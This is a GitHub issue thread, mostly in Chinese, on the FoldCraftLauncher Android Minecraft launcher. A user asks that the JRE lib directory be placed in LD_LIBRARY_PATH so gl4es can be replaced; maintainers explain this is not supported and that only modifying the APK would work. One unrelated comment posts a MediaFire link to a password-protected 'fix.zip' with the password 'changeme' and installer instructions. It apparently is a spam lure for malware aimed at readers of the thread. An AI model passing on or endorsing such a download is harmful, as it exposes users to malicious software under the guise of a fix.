### ISSUE TITLE
用户可添加自定义库文件

### ISSUE THREAD

**Issue by dontknowhy** [FCL-Team/FoldCraftLauncher#563]
### Before making issue / 在发布提问之前...

- [X] I understand this is a request, not a wish.我明白这是在提出请求而不是在许愿。

### Description / 描述

希望FCL能在设置LD_LIBRARY_PATH的时候加上目前jre的lib目录（且在第一个）
_例如`LD_LIBRARY_PATH=/data/user/0/com.tungsten.fcl/app_runtime/java/jre21:/system/lib64:/vendor/lib64:/vendor/lib64/hw:/data/app/~~Fpb9_fhML71hIOM1oPF7yQ==/com.tungsten.fcl-wQPN39-Z9UIgUAUATFNZEg==/lib/arm64`_

### Why / 原因

这样子抽象用户们就可以替换掉gl4es库而不需要修改apk文件了，如果可以的话貌似修改OpenGL的库文件来用panfrost跑Minecraft也不是不行（貌似bug很多，且我的GPU不支持）。
且仅修改`LD_LIBRARY_PATH`可以防止电子文盲以及想做替换库文件的作者搞事，因为门槛高且唯一的办法就是用隐藏的终端拷贝文件。

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dontknowhy** [comment]
![gl4es理论能丢进去跑](https://img.icdown.club/pan/site/img.icdown.club/i/2024/08/29/k485qk.jpg)
自己在Termux编译的gl4es理论是可以被加载的

**Comment by ShirosakiMio** [comment]
FCL并不会通过LD_LIBRARY_PATH去寻找lib

**Comment by ShirosakiMio** [comment]
实际上删了LD_LIBRARY_PATH都几乎没有影响

**Comment by dontknowhy** [comment]
> 实际上删了LD_LIBRARY_PATH都几乎没有影响

那我怎么替换掉LWJGL加载的东西呢？
目前已经被设置成加载`libgl4es_114.so`，且设置这玩意的选项在很后面且更改不到。

**Comment by ShirosakiMio** [comment]
不动代码的情况下只能改安装包

**Comment by dontknowhy** [comment]
> 不动代码的情况下只能改安装包

那可以改到有点余地让我们自己折腾那些文件么（）

**Comment by dontknowhy** [comment]
> 用命令行直接换不就好了

要死的是论gl4es读取的只会是在apk解压的gl4es而不是扔在jre的lib文件夹的gl4es（
就是因为不会自己读另外搞的gl4es才开issue

**Comment by ShirosakiMio** [comment]
emm那个目录是只读，那你还是自己改安装包吧

**Comment by dontknowhy** [comment]
哭了，貌似我还要自己重新签名而不是覆盖安装：(

**Comment by ShirosakiMio** [comment]
是的，并不建议改包

**Comment by ShirosakiMio** [comment]
渲染器都是内置预定义好的，包括各种环境变量，所以并没有设计自定义的打算

**Comment by dontknowhy** [comment]
> 是的，并不建议改包

走投无路.jpg
不如早日放弃，立地成佛，该玩玩，该乐乐（
